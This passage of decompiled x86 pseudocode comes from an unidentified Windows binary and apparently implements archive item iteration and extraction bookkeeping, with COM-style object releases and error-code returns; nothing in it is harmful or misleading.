																 *(_t1785 - 0x180) =  *(_t1785 - 0x180) & 0x00000000;
																 *_t1059 =  *_t1059 & 0x00000000;
																__eflags =  *_t1059;
															} else {
																__eflags =  *(_t1785 - 0x188);
																if(__eflags == 0) {
																	_t1372 =  *(_t1785 - 0xa0);
																	__eflags = _t1372;
																	if(__eflags != 0) {
																		__eflags = _t1372 + 8;
																		E00401E26(_t1785 - 0x184, _t1372 + 8);
																	}
																	 *(_t1785 - 0x188) = 1;
																}
															}
															_push(_t1785 - 0x1b4);
															E004283DB(_t1785 - 0x4cc, __eflags);
															_t1062 =  *(_t1785 - 0x24);
															 *(_t1785 - 4) = 0xf;
															__eflags = _t1062 -  *(_t1785 - 0xac);
															if(_t1062 >=  *(_t1785 - 0xac)) {
																L168:
																_t1763 =  *( *((intOrPtr*)(_t1785 - 0x58)) + 8);
																__eflags = _t1763;
																 *(_t1785 - 0x20) = _t1763;
																if(_t1763 == 0) {
																	goto L225;
																}
																E00404AD0(_t1785 - 0x138, 0x14);
																 *((intOrPtr*)(_t1785 - 0x138)) = 0x47b3fc;
																 *(_t1785 - 4) = 0x1c;
																E0040867E(_t1785 - 0x138, _t1763);
																__eflags =  *(_t1785 - 0x6c);
																if( *(_t1785 - 0x6c) > 0) {
																	L171:
																	 *(_t1785 - 0x9c) = 1;
																	L173:
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																	__eflags = _t1763;
																	if(_t1763 <= 0) {
																		L176:
																		E0043375E(_t1785 - 0x138, _t1730, E00432EB7, _t1785 - 0x9c);
																		E00404AD0(_t1785 - 0xfc, 4);
																		 *((intOrPtr*)(_t1785 - 0xfc)) = 0x47ab80;
																		 *(_t1785 - 4) = 0x1d;
																		E0040867E(_t1785 - 0xfc, _t1763);
																		__eflags = _t1763;
																		if(_t1763 <= 0) {
																			L179:
																			 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																			__eflags = _t1763;
																			if(_t1763 <= 0) {
																				L224:
																				 *(_t1785 - 4) = 0x1c;
																				E00408604(_t1785 - 0xfc);
																				 *(_t1785 - 4) = 0xf;
																				E00408604(_t1785 - 0x138);
																				goto L225;
																			}
																			while(1) {
																				 *(_t1785 - 0x94) = 0;
																				 *(_t1785 - 0x90) = 0;
																				 *(_t1785 - 0xc0) = 0;
																				 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																				 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																				E00401E9A(_t1785 - 0xc0, 3);
																				 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																				__eflags =  *(_t1785 - 0x10) - _t1763;
																				 *(_t1785 - 4) = 0x1e;
																				if( *(_t1785 - 0x10) >= _t1763) {
																					goto L198;
																				}
																				while(1) {
																					L183:
																					_t1555 =  *(_t1785 + 0x14);
																					_t1188 = _t1555;
																					asm("cdq");
																					__eflags = _t1730 -  *(_t1785 - 0x6c);
																					if(__eflags > 0) {
																						break;
																					}
																					if(__eflags < 0) {
																						L186:
																						_t1559 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4));
																						 *(_t1785 - 0x94) =  *(_t1785 - 0x94) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4)) + 0x20));
																						_t1193 =  *((intOrPtr*)(_t1785 + 0x1c));
																						asm("adc [ebp-0x90], edx");
																						_t1730 =  *(_t1785 - 0x90);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x1c));
																						if(__eflags > 0) {
																							break;
																						}
																						if(__eflags < 0) {
																							L189:
																							__eflags =  *((char*)(_t1193 + 0x20));
																							if( *((char*)(_t1193 + 0x20)) == 0) {
																								L194:
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																								__eflags =  *(_t1785 + 0x14) +  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																								if( *(_t1785 + 0x14) +  *(_t1785 - 0x10) <  *(_t1785 - 0x20)) {
																									continue;
																								}
																								break;
																							}
																							E00430E91(_t1559, _t1785 - 0x84);
																							__eflags =  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x1f;
																							if( *(_t1785 + 0x14) != 0) {
																								_t1730 =  *(_t1785 - 0xc0);
																								_t1197 = E0040807A(_t1730);
																								__eflags = _t1197;
																								if(_t1197 != 0) {
																									 *(_t1785 - 4) = 0x1e;
																									E00407A18( *(_t1785 - 0x84));
																									break;
																								}
																								L193:
																								 *(_t1785 - 4) = 0x1e;
																								E00407A18( *(_t1785 - 0x84));
																								goto L194;
																							}
																							E00401E26(_t1785 - 0xc0, _t1785 - 0x84);
																							goto L193;
																						}
																						_t1730 =  *(_t1785 - 0x94);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x18));
																						if(_t1730 >  *((intOrPtr*)(_t1193 + 0x18))) {
																							break;
																						}
																						goto L189;
																					}
																					__eflags = _t1188 -  *(_t1785 - 0x70);
																					if(_t1188 >=  *(_t1785 - 0x70)) {
																						break;
																					}
																					goto L186;
																				}
																				__eflags =  *(_t1785 + 0x14) - 1;
																				if( *(_t1785 + 0x14) >= 1) {
																					L199:
																					_push(0x78);
																					_t1113 = E004079F2();
																					 *(_t1785 - 0x18) = _t1113;
																					__eflags = _t1113;
																					 *(_t1785 - 4) = 0x20;
																					if(_t1113 == 0) {
																						_t1114 = 0;
																						__eflags = 0;
																					} else {
																						_t1114 = E00429B31(_t1113);
																					}
																					__eflags = _t1114;
																					 *(_t1785 - 0x1c) = _t1114;
																					 *(_t1785 - 4) = 0x1e;
																					 *(_t1785 - 0x50) = _t1114;
																					if(_t1114 != 0) {
																						 *((intOrPtr*)( *_t1114 + 4))(_t1114);
																					}
																					_push( *(_t1785 + 0x14));
																					 *(_t1785 - 4) = 0x21;
																					E00429C75( *(_t1785 - 0x1c),  *((intOrPtr*)(_t1785 + 0x18)), ( *(_t1785 - 0x10) << 2) +  *((intOrPtr*)(_t1785 - 0xf0)));
																					E0042DB56(_t1785 - 0x3a4);
																					_push(_t1746);
																					_push( *((intOrPtr*)(_t1785 + 0x10)));
																					_t1768 =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																					 *(_t1785 - 4) = 0x22;
																					_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																					_push(_t1785 - 0x3a4);
																					_push(_t1785 - 0x34);
																					_push(0);
																					_push( *(_t1785 - 0x1c));
																					_t1125 = E004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																					__eflags = _t1125;
																					 *(_t1785 - 0x18) = _t1125;
																					if(__eflags != 0) {
																						 *(_t1785 - 4) = 0x21;
																						E0042B864(_t1785 - 0x3a4, __eflags);
																						_t1127 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1127;
																						if(_t1127 != 0) {
																							 *((intOrPtr*)( *_t1127 + 8))(_t1127);
																						}
																						E00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x23;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						E0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 =  *(_t1785 - 0x18);
																					} else {
																						_t1141 =  *((intOrPtr*)(_t1785 + 0x10));
																						while(1) {
																							__eflags = _t1768 -  *((intOrPtr*)(_t1141 + 8));
																							if(_t1768 >=  *((intOrPtr*)(_t1141 + 8))) {
																								break;
																							}
																							_t1730 =  *( *((intOrPtr*)(_t1141 + 0xc)) + _t1768 * 8);
																							 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																							asm("adc [edi+0x2c], ecx");
																							_t1768 = _t1768 + 1;
																						}
																						 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x3a4);
																						_push(_t1785 - 0x3a4);
																						_t1144 =  *((intOrPtr*)(_t1785 + 0x10));
																						asm("adc [edi+0x24], edx");
																						_t693 = _t1144 + 0x3c; // 0x3c
																						E0042F063(_t693);
																						_t1769 = 0;
																						__eflags =  *(_t1785 + 0x14);
																						 *(_t1785 - 0x18) = 0;
																						if(__eflags <= 0) {
																							L221:
																							_t750 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																							E00415C6D(_t750,  *(_t1785 - 0x18));
																							_t1771 =  *(_t1785 - 0x10) +  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x21;
																							 *(_t1785 - 0x10) = _t1771;
																							E0042B864(_t1785 - 0x3a4, __eflags);
																							_t1149 =  *(_t1785 - 0x1c);
																							 *(_t1785 - 4) = 0x1e;
																							__eflags = _t1149;
																							if(_t1149 != 0) {
																								 *((intOrPtr*)( *_t1149 + 8))(_t1149);
																							}
																							 *(_t1785 - 4) = 0x1d;
																							E00407A18( *(_t1785 - 0xc0));
																							__eflags = _t1771 -  *(_t1785 - 0x20);
																							if(_t1771 <  *(_t1785 - 0x20)) {
																								_t1763 =  *(_t1785 - 0x20);
																								 *(_t1785 - 0x94) = 0;
																								 *(_t1785 - 0x90) = 0;
																								 *(_t1785 - 0xc0) = 0;
																								 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																								 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																								E00401E9A(_t1785 - 0xc0, 3);
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																								__eflags =  *(_t1785 - 0x10) - _t1763;
																								 *(_t1785 - 4) = 0x1e;
																								if( *(_t1785 - 0x10) >= _t1763) {
																									goto L198;
																								}
																								goto L183;
																							} else {
																								goto L224;
																							}
																						}
																						_t1153 =  *(_t1785 - 0x10) << 2;
																						__eflags = _t1153;
																						 *(_t1785 - 0x38) = _t1153;
																						while(1) {
																							 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *(_t1785 - 0x38) +  *((intOrPtr*)(_t1785 - 0xf0))) * 4));
																							E0042EAC2(_t1785 - 0x124);
																							_t1158 =  *((intOrPtr*)(_t1785 - 0x58));
																							 *(_t1785 - 4) = 0x24;
																							__eflags =  *((char*)(_t1158 + 0x39));
																							_push(_t1785 - 0x2f4);
																							if( *((char*)(_t1158 + 0x39)) == 0) {
																								_push(_t1785 - 0x124);
																								_push( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)))));
																								E004308F5(_t1445);
																							} else {
																								_t1730 = _t1785 - 0x124;
																								E0043327A( *((intOrPtr*)(_t1785 - 0x58)), _t1730);
																							}
																							__eflags =  *((char*)(_t1785 - 0x2d0));
																							if(__eflags != 0) {
																								break;
																							}
																							__eflags =  *((char*)(_t1785 - 0x107));
																							if(__eflags != 0) {
																								break;
																							}
																							_t1179 =  *(_t1785 - 0x1c);
																							_t1543 =  *((intOrPtr*)(_t1179 + 0x48));
																							__eflags =  *((char*)(_t1543 + _t1769));
																							if( *((char*)(_t1543 + _t1769)) != 0) {
																								 *((intOrPtr*)(_t1785 - 0x118)) =  *((intOrPtr*)( *((intOrPtr*)(_t1179 + 0x5c)) + _t1769 * 4));
																								_t1547 =  *((intOrPtr*)(_t1179 + 0x70));
																								_t1181 =  *(_t1547 + _t1769 * 8);
																								 *(_t1785 - 0x124) = _t1181;
																								_t1548 =  *(_t1547 + 4 + _t1769 * 8);
																								__eflags = _t1181 | _t1548;
																								 *(_t1785 - 0x120) = _t1548;
																								if((_t1181 | _t1548) == 0) {
																									 *(_t1785 - 0x106) =  *(_t1785 - 0x106) & 0x00000000;
																									_t738 = _t1785 - 0x108;
																									 *_t738 =  *(_t1785 - 0x108) & 0x00000000;
																									__eflags =  *_t738;
																								} else {
																									 *(_t1785 - 0x18) =  *(_t1785 - 0x18) + 1;
																									 *(_t1785 - 0x106) = 1;
																									 *(_t1785 - 0x108) = 1;
																								}
																								_push(_t1785 - 0x2f4);
																								_push(_t1785 - 0x124);
																								E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																							}
																							 *(_t1785 - 4) = 0x22;
																							E00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																							 *(_t1785 - 0x38) =  *(_t1785 - 0x38) + 4;
																							_t1769 = _t1769 + 1;
																							__eflags = _t1769 -  *(_t1785 + 0x14);
																							if(__eflags < 0) {
																								continue;
																							} else {
																								goto L221;
																							}
																						}
																						E00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																						 *(_t1785 - 4) = 0x21;
																						E0042B864(_t1785 - 0x3a4, __eflags);
																						_t1165 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1165;
																						if(_t1165 != 0) {
																							 *((intOrPtr*)( *_t1165 + 8))(_t1165);
																						}
																						E00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x25;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						E0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 = 0x80004005;
																					}
																					goto L286;
																				}
																				L198:
																				 *(_t1785 + 0x14) = 1;
																				goto L199;
																			}
																		}
																		_t590 = _t1785 + 0x14;
																		 *_t590 =  *(_t1785 + 0x14) & 0x00000000;
																		__eflags =  *_t590;
																		 *(_t1785 - 0x18) = _t1763;
																		do {
																			E00415C6D(_t1785 - 0xfc,  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1785 - 0x12c)) + 4)));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 0x14;
																			_t600 = _t1785 - 0x18;
																			 *_t600 =  *(_t1785 - 0x18) - 1;
																			__eflags =  *_t600;
																		} while ( *_t600 != 0);
																		goto L179;
																	} else {
																		goto L174;
																	}
																	do {
																		L174:
																		_push( *(_t1785 - 0x9c));
																		_t1206 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)) + 0xc)) +  *(_t1785 - 0x10) * 4);
																		_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1206 * 4)));
																		_push(_t1206);
																		_t1207 = E00432D91(_t1785 - 0x3b8);
																		_t1790 = _t1788 - 0x14;
																		_t1573 = 5;
																		memcpy(_t1790, _t1207, _t1573 << 2);
																		_t1788 = _t1790 + 0xc;
																		E00433730(_t1785 - 0x138);
																		 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																		__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																	} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x20));
																	_t1746 =  *(_t1785 - 0x68);
																	_t1763 =  *(_t1785 - 0x20);
																	goto L176;
																}
																__eflags =  *(_t1785 - 0x70) - 1;
																if( *(_t1785 - 0x70) <= 1) {
																	_t561 = _t1785 - 0x9c;
																	 *_t561 =  *(_t1785 - 0x9c) & 0x00000000;
																	__eflags =  *_t561;
																	goto L173;
																}
																goto L171;
															} else {
																_t1212 = _t1062 + _t1062 * 2 << 2;
																 *(_t1785 - 0x1c) = _t1212;
																while(1) {
																	_t1213 = _t1212 +  *((intOrPtr*)(_t1785 - 0xa8));
																	 *(_t1785 - 0x38) = _t1213;
																	__eflags =  *((intOrPtr*)(_t1213 + 4)) -  *(_t1785 - 0x2c);
																	if( *((intOrPtr*)(_t1213 + 4)) !=  *(_t1785 - 0x2c)) {
																		goto L168;
																	}
																	_t1577 =  *(_t1785 - 0x38);
																	_t1733 =  *((intOrPtr*)(_t1445 + 0x5c));
																	_t1215 =  *_t1577;
																	_t1774 =  *_t1577 << 2;
																	__eflags = _t1577[2] -  *((intOrPtr*)(_t1774 + _t1733));
																	if(_t1577[2] !=  *((intOrPtr*)(_t1774 + _t1733))) {
																		E004329C5(_t1785 - 0x1d4);
																		 *(_t1785 - 4) = 0x11;
																		_t1217 = E0040F595(_t1785 - 0x1d4);
																		__eflags = _t1217;
																		 *(_t1785 + 0x14) = _t1217;
																		if(_t1217 != 0) {
																			 *(_t1785 - 4) = 0xf;
																			L00423D3B(_t1785 - 0x1d4);
																			 *(_t1785 - 4) = 0xe;
																			E00428A47(_t1785 - 0x4cc);
																			 *(_t1785 - 4) = 5;
																			E00428510(_t1785 - 0x1b4, __eflags);
																			 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																			 *(_t1785 - 4) = 0x12;
																			E0040862D();
																			 *(_t1785 - 4) = 4;
																			E00408604(_t1785 - 0x4c);
																			 *(_t1785 - 4) = 3;
																			E0043353F(_t1785 - 0x2cc, __eflags);
																			__eflags = _t1746;
																			 *(_t1785 - 4) = 1;
																			if(_t1746 != 0) {
																				 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																			}
																			_t1765 =  *(_t1785 + 0x14);
																			goto L285;
																		}
																		 *(_t1785 + 0x20) =  *(_t1785 + 0x20) & _t1217;
																		 *(_t1785 - 0x64) =  *(_t1785 - 0x64) & _t1217;
																		_push(_t1785 + 0x20);
																		_push(_t1785 - 0x64);
																		 *(_t1785 - 4) = 0x14;
																		E0040F5DB(_t1785 - 0x1d4);
																		E00404AD0(_t1785 - 0xe8, 1);
																		 *((intOrPtr*)(_t1785 - 0xe8)) = 0x47ab08;
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																		 *(_t1785 - 4) = 0x15;
																		_t1589 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																		__eflags = _t1589;
																		_t1232 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																		 *(_t1785 - 0x18) = _t1589;
																		if(_t1589 <= 0) {
																			L146:
																			_t1235 = E00430EFB( *((intOrPtr*)(_t1785 - 0x2b0)), _t1785, _t1445,  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774), _t1785 - 0xe8,  *(_t1785 + 0x20));
																			__eflags = _t1235;
																			 *(_t1785 + 0x14) = _t1235;
																			if(_t1235 != 0) {
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1237 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1237;
																				if(_t1237 != 0) {
																					 *((intOrPtr*)( *_t1237 + 8))(_t1237);
																				}
																				_t1238 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1238;
																				if(_t1238 != 0) {
																					 *((intOrPtr*)( *_t1238 + 8))(_t1238);
																				}
																				 *(_t1785 - 4) = 0xf;
																				L00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x16;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				E0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 + 0x14);
																				goto L285;
																			}
																			_t1249 =  *(_t1785 + 0x20);
																			__eflags = _t1249;
																			if(_t1249 != 0) {
																				 *((intOrPtr*)( *_t1249 + 8))(_t1249);
																				_t420 = _t1785 + 0x20;
																				 *_t420 =  *(_t1785 + 0x20) & 0x00000000;
																				__eflags =  *_t420;
																			}
																			E0040C9B4(_t1785 - 0x2b4,  *((intOrPtr*)(_t1785 - 0x98)));
																			_t1601 =  *((intOrPtr*)(_t1445 + 0x17c));
																			 *(_t1785 - 0x298) =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																			_t1254 =  *((intOrPtr*)(_t1445 + 0x190)) + _t1774;
																			 *(_t1785 + 0x14) = _t1254;
																			_t1255 =  *_t1254;
																			_t1730 =  *((intOrPtr*)(_t1601 + _t1255 * 8)) +  *((intOrPtr*)(_t1445 + 0x148));
																			asm("adc eax, [ebx+0x14c]");
																			 *(_t1785 - 0x2a4) = _t1730;
																			 *((intOrPtr*)(_t1785 - 0x2a0)) =  *((intOrPtr*)(_t1601 + 4 + _t1255 * 8));
																			 *((intOrPtr*)(_t1785 - 0x29c)) =  *((intOrPtr*)(_t1445 + 0xc)) +  *( *(_t1785 + 0x14)) * 8;
																			L0040FBD7(_t1785 - 0x2cc);
																			 *(_t1785 + 0x14) =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																			E0042DB56(_t1785 - 0x34c);
																			_push(_t1746);
																			_push( *((intOrPtr*)(_t1785 + 0x10)));
																			 *(_t1785 - 4) = 0x17;
																			_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																			_push(_t1785 - 0x34c);
																			_push(_t1785 - 0x34);
																			_push(0);
																			_push( *(_t1785 - 0x64));
																			_t1268 = E004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																			__eflags = _t1268;
																			 *(_t1785 - 0x18) = _t1268;
																			if(__eflags != 0) {
																				 *(_t1785 - 4) = 0x15;
																				E0042B864(_t1785 - 0x34c, __eflags);
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1271 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1271;
																				if(_t1271 != 0) {
																					 *((intOrPtr*)( *_t1271 + 8))(_t1271);
																				}
																				_t1272 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1272;
																				if(_t1272 != 0) {
																					 *((intOrPtr*)( *_t1272 + 8))(_t1272);
																				}
																				 *(_t1785 - 4) = 0xf;
																				L00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x18;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				E0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 - 0x18);
																				goto L285;
																			} else {
																				E00467AC0( *((intOrPtr*)(_t1785 - 0x2c4)));
																				__eflags =  *(_t1785 - 0x2b8);
																				if(__eflags != 0) {
																					_t1765 =  *(_t1785 - 0x2b8);
																					 *(_t1785 - 4) = 0x15;
																					E0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1286 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1286;
																					if(_t1286 != 0) {
																						 *((intOrPtr*)( *_t1286 + 8))(_t1286);
																					}
																					_t1287 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1287;
																					if(_t1287 != 0) {
																						 *((intOrPtr*)( *_t1287 + 8))(_t1287);
																					}
																					 *(_t1785 - 4) = 0xf;
																					L00423D3B(_t1785 - 0x1d4);
																					 *(_t1785 - 4) = 0xe;
																					E00428A47(_t1785 - 0x4cc);
																					 *(_t1785 - 4) = 5;
																					E00428510(_t1785 - 0x1b4, __eflags);
																					 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																					 *(_t1785 - 4) = 0x19;
																					E0040862D();
																					 *(_t1785 - 4) = 4;
																					E00408604(_t1785 - 0x4c);
																					goto L255;
																				}
																				_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																				_t1298 =  *(_t1785 + 0x14);
																				__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				if(_t1298 >=  *((intOrPtr*)(_t1627 + 8))) {
																					L154:
																					 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x34c);
																					_push(_t1785 - 0x34c);
																					_t1301 =  *((intOrPtr*)(_t1785 + 0x10));
																					asm("adc [edi+0x24], edx");
																					_t478 = _t1301 + 0x3c; // 0x3c
																					E0042F063(_t478);
																					 *(_t1785 - 4) = 0x15;
																					E0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1305 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1305;
																					if(_t1305 != 0) {
																						 *((intOrPtr*)( *_t1305 + 8))(_t1305);
																					}
																					_t1306 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1306;
																					if(_t1306 != 0) {
																						 *((intOrPtr*)( *_t1306 + 8))(_t1306);
																					}
																					 *(_t1785 - 4) = 0xf;
																					L00423D3B(_t1785 - 0x1d4);
																					L159:
																					_t494 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																					E00415C6D(_t494,  *((intOrPtr*)( *(_t1785 - 0x38) + 8)));
																					 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																					_t1312 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																					_t1775 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																					__eflags = _t1312;
																					 *(_t1785 - 0x38) = _t1312;
																					if(_t1312 <= 0) {
																						L167:
																						 *(_t1785 - 0x24) =  *(_t1785 - 0x24) + 1;
																						 *(_t1785 - 0x1c) =  *(_t1785 - 0x1c) + 0xc;
																						__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
																						if( *(_t1785 - 0x24) <  *(_t1785 - 0xac)) {
																							_t1212 =  *(_t1785 - 0x1c);
																							continue;
																						}
																						goto L168;
																					} else {
																						goto L160;
																					}
																					do {
																						L160:
																						E0042EAC2(_t1785 - 0x178);
																						 *(_t1785 - 4) = 0x1a;
																						E004308F5(_t1445, _t1775, _t1785 - 0x178, _t1785 - 0x1fc);
																						__eflags =  *((char*)(_t1785 - 0x15c));
																						if( *((char*)(_t1785 - 0x15c)) != 0) {
																							 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																							_t1321 =  *( *((intOrPtr*)(_t1785 - 0xc8)) + _t1775 * 4);
																							__eflags = _t1321;
																							if(_t1321 >= 0) {
																								_t1322 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1321 * 4);
																								 *(_t1785 - 0x18) = _t1322;
																								__eflags =  *((char*)(_t1322 + 0x38));
																								if( *((char*)(_t1322 + 0x38)) == 0) {
																									__eflags =  *((char*)(_t1322 + 0x39));
																									if( *((char*)(_t1322 + 0x39)) != 0) {
																										E0042EAC2(_t1785 - 0x158);
																										_push(_t1785 - 0x1fc);
																										_t1730 = _t1785 - 0x158;
																										 *(_t1785 - 4) = 0x1b;
																										E0043327A( *(_t1785 - 0x18), _t1730);
																										 *(_t1785 - 0x158) =  *((intOrPtr*)(_t1785 - 0x178));
																										 *((intOrPtr*)(_t1785 - 0x154)) =  *((intOrPtr*)(_t1785 - 0x174));
																										 *((intOrPtr*)(_t1785 - 0x14c)) =  *((intOrPtr*)(_t1785 - 0x16c));
																										 *((char*)(_t1785 - 0x13a)) =  *((intOrPtr*)(_t1785 - 0x15a));
																										 *((char*)(_t1785 - 0x13c)) =  *((intOrPtr*)(_t1785 - 0x15c));
																										E00430A06(_t1785 - 0x178, _t1785 - 0x158);
